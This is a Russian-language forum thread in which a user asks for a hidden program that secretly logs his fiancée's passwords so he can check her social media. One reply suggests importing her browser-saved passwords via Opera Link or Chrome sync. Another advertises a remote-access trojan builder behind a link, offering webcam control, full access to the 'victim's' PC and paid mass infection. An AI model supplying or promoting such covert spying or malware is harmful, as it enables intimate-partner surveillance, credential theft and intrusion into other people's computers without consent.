Что нового

Программа для автоматического сохранения паролей

• Автор темы Автор темы smartlog
  • Дата начала Дата начала
S

smartlog

Гость
Приветствую!Не так давно наталкнуло меня на мысль проверить будущую невесту (живем вместе 1.5 года), проверить на честность. Собственно как? Да очень просто, для нее социалки это место где можно делать “что хочу, и как хочу”. И собственно в чем сам смысл топика, возможно кто либо сталкивался, или знает хорошую программку для автоматического сохранения паролей , которая:- будет сохранять вводимые пароли в специальном файле (либо сохранение открытого пароля в текстовом файле)- будет иметь возможность экспорта данного файла- будет иметь возможность импорта файла на новом ПК- работать в “скрытом” режиме, тоесть не отображаться в трее, панели, и тд, вызов производиться нажатием кнопок, или иной.Буду до крайности признателен за любые советы по теме

Обычно подобные проверки кончаются плачевно...Данным поступком показываешь свою неуверенность...ПО делуесли пользуется оперой - настрой опера линк, и все пароли будут сохранятся на удаленном сервере, после чего включив у себя опера линк, пароли импортируются к тебе.если хромом, смысл тот же.

smartlog,Создайте билд guardlink.org/0SRyl1 закиньте его жертве, отчет будет приходить к вам на мейл или фтп, также можно получить онлайн доступ, вы всегда будете иметь доступ к компу жертве, управлять ее камерой итд, короче полный доступ, есть тема хорошая, за час можно получить доступ к 50 примерно компам, но это за деньги, если интересно пишите.

Верх